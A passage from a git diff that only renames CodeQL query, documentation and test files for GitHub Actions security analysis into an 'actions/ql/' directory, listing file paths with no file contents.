rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md
similarity index 100%
rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md
rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql
rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md
similarity index 100%
rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md
rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql
similarity index 100%
rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql
rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
similarity index 100%
rename from ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
similarity index 100%
rename from ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
similarity index 100%
rename from ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md
similarity index 100%
rename from ql/src/Security/CWE-829/UnpinnedActionsTag.md
rename to actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
similarity index 100%
rename from ql/src/Security/CWE-829/UnpinnedActionsTag.ql
rename to actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql
rename to actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql
diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md
similarity index 100%
rename from ql/src/Security/CWE-829/UnversionedImmutableAction.md
rename to actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md
diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
similarity index 100%
rename from ql/src/Security/CWE-829/UnversionedImmutableAction.ql
rename to actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/actions/ql/src/Security/CWE-918/RequestForgery.ql
similarity index 100%
rename from ql/src/Security/CWE-918/RequestForgery.ql
rename to actions/ql/src/Security/CWE-918/RequestForgery.ql
diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md
similarity index 100%
rename from ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md
rename to actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md
diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
similarity index 100%
rename from ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
rename to actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
diff --git a/ql/src/codeql-pack.lock.yml b/actions/ql/src/codeql-pack.lock.yml
similarity index 100%
rename from ql/src/codeql-pack.lock.yml
rename to actions/ql/src/codeql-pack.lock.yml
diff --git a/ql/src/codeql-suites/actions-all.qls b/actions/ql/src/codeql-suites/actions-all.qls
similarity index 100%
rename from ql/src/codeql-suites/actions-all.qls
rename to actions/ql/src/codeql-suites/actions-all.qls
diff --git a/ql/src/codeql-suites/actions-bughalla.qls b/actions/ql/src/codeql-suites/actions-bughalla.qls
similarity index 100%
rename from ql/src/codeql-suites/actions-bughalla.qls
rename to actions/ql/src/codeql-suites/actions-bughalla.qls
diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/actions/ql/src/codeql-suites/actions-code-scanning.qls
similarity index 100%
rename from ql/src/codeql-suites/actions-code-scanning.qls
rename to actions/ql/src/codeql-suites/actions-code-scanning.qls
diff --git a/ql/src/codeql-suites/actions-security-and-quality.qls b/actions/ql/src/codeql-suites/actions-security-and-quality.qls
similarity index 100%
rename from ql/src/codeql-suites/actions-security-and-quality.qls
rename to actions/ql/src/codeql-suites/actions-security-and-quality.qls
diff --git a/ql/src/codeql-suites/actions-summaries-queries.qls b/actions/ql/src/codeql-suites/actions-summaries-queries.qls
similarity index 100%
rename from ql/src/codeql-suites/actions-summaries-queries.qls
rename to actions/ql/src/codeql-suites/actions-summaries-queries.qls
diff --git a/ql/src/qlpack.yml b/actions/ql/src/qlpack.yml
similarity index 100%
rename from ql/src/qlpack.yml
rename to actions/ql/src/qlpack.yml
diff --git a/ql/test/codeql-pack.lock.yml b/actions/ql/test/codeql-pack.lock.yml
similarity index 100%
rename from ql/test/codeql-pack.lock.yml
rename to actions/ql/test/codeql-pack.lock.yml
diff --git a/ql/test/library-tests/.github/workflows/commands.yml b/actions/ql/test/library-tests/.github/workflows/commands.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/commands.yml
rename to actions/ql/test/library-tests/.github/workflows/commands.yml
diff --git a/ql/test/library-tests/.github/workflows/expression_nodes.yml b/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/expression_nodes.yml
rename to actions/ql/test/library-tests/.github/workflows/expression_nodes.yml
diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/actions/ql/test/library-tests/.github/workflows/multiline.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/multiline.yml
rename to actions/ql/test/library-tests/.github/workflows/multiline.yml
diff --git a/ql/test/library-tests/.github/workflows/multiline2.yml b/actions/ql/test/library-tests/.github/workflows/multiline2.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/multiline2.yml
rename to actions/ql/test/library-tests/.github/workflows/multiline2.yml
diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/actions/ql/test/library-tests/.github/workflows/poisonable_steps.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/poisonable_steps.yml
rename to actions/ql/test/library-tests/.github/workflows/poisonable_steps.yml
diff --git a/ql/test/library-tests/.github/workflows/shell.yml b/actions/ql/test/library-tests/.github/workflows/shell.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/shell.yml
rename to actions/ql/test/library-tests/.github/workflows/shell.yml
diff --git a/ql/test/library-tests/.github/workflows/test.yml b/actions/ql/test/library-tests/.github/workflows/test.yml
similarity index 100%
rename from ql/test/library-tests/.github/workflows/test.yml
rename to actions/ql/test/library-tests/.github/workflows/test.yml
diff --git a/ql/test/library-tests/commands.expected b/actions/ql/test/library-tests/commands.expected
similarity index 100%
rename from ql/test/library-tests/commands.expected
rename to actions/ql/test/library-tests/commands.expected
diff --git a/ql/test/library-tests/commands.ql b/actions/ql/test/library-tests/commands.ql
similarity index 100%
rename from ql/test/library-tests/commands.ql
rename to actions/ql/test/library-tests/commands.ql
diff --git a/ql/test/library-tests/poisonable_steps.expected b/actions/ql/test/library-tests/poisonable_steps.expected
similarity index 100%
rename from ql/test/library-tests/poisonable_steps.expected
rename to actions/ql/test/library-tests/poisonable_steps.expected
diff --git a/ql/test/library-tests/poisonable_steps.ql b/actions/ql/test/library-tests/poisonable_steps.ql
similarity index 100%
rename from ql/test/library-tests/poisonable_steps.ql
rename to actions/ql/test/library-tests/poisonable_steps.ql
diff --git a/ql/test/library-tests/test.expected b/actions/ql/test/library-tests/test.expected
similarity index 100%
rename from ql/test/library-tests/test.expected
rename to actions/ql/test/library-tests/test.expected
diff --git a/ql/test/library-tests/test.ql b/actions/ql/test/library-tests/test.ql
similarity index 100%
rename from ql/test/library-tests/test.ql
rename to actions/ql/test/library-tests/test.ql
diff --git a/ql/test/library-tests/workflowenum.expected b/actions/ql/test/library-tests/workflowenum.expected
similarity index 100%
rename from ql/test/library-tests/workflowenum.expected
rename to actions/ql/test/library-tests/workflowenum.expected
diff --git a/ql/test/library-tests/workflowenum.ql b/actions/ql/test/library-tests/workflowenum.ql
similarity index 100%
rename from ql/test/library-tests/workflowenum.ql
rename to actions/ql/test/library-tests/workflowenum.ql
diff --git a/ql/test/qlpack.yml b/actions/ql/test/qlpack.yml
similarity index 100%
rename from ql/test/qlpack.yml
rename to actions/ql/test/qlpack.yml
diff --git a/ql/test/query-tests/Models/.github/workflows/calling_composite.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml
similarity index 100%
rename from ql/test/query-tests/Models/.github/workflows/calling_composite.yml
rename to actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml
diff --git a/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml
similarity index 100%
rename from ql/test/query-tests/Models/.github/workflows/calling_workflow.yml
rename to actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml
diff --git a/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml
similarity index 100%
rename from ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml
rename to actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml
diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected
similarity index 100%
rename from ql/test/query-tests/Models/CompositeActionsSinks.expected
rename to actions/ql/test/query-tests/Models/CompositeActionsSinks.expected
diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref
similarity index 100%
rename from ql/test/query-tests/Models/CompositeActionsSinks.qlref
rename to actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref
diff --git a/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected
similarity index 100%
rename from ql/test/query-tests/Models/CompositeActionsSources.expected
rename to actions/ql/test/query-tests/Models/CompositeActionsSources.expected
diff --git a/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref
similarity index 100%
rename from ql/test/query-tests/Models/CompositeActionsSources.qlref
rename to actions/ql/test/query-tests/Models/CompositeActionsSources.qlref
diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected
similarity index 100%
rename from ql/test/query-tests/Models/CompositeActionsSummaries.expected
rename to actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected
diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref
similarity index 100%
rename from ql/test/query-tests/Models/CompositeActionsSummaries.qlref
rename to actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected
similarity index 100%
rename from ql/test/query-tests/Models/ReusableWorkflowsSinks.expected
rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref
similarity index 100%
rename from ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref
rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected
similarity index 100%
rename from ql/test/query-tests/Models/ReusableWorkflowsSources.expected
rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref
similarity index 100%
rename from ql/test/query-tests/Models/ReusableWorkflowsSources.qlref
rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected
similarity index 100%
rename from ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected
rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref
similarity index 100%
rename from ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref
rename to actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref
diff --git a/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml
similarity index 100%
rename from ql/test/query-tests/Models/action1/action.yml
rename to actions/ql/test/query-tests/Models/action1/action.yml
diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml
rename to actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml
diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml
rename to actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml
diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected
rename to actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected
diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref b/actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref
rename to actions/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref
diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml
rename to actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml
rename to actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml
diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
similarity index 100%
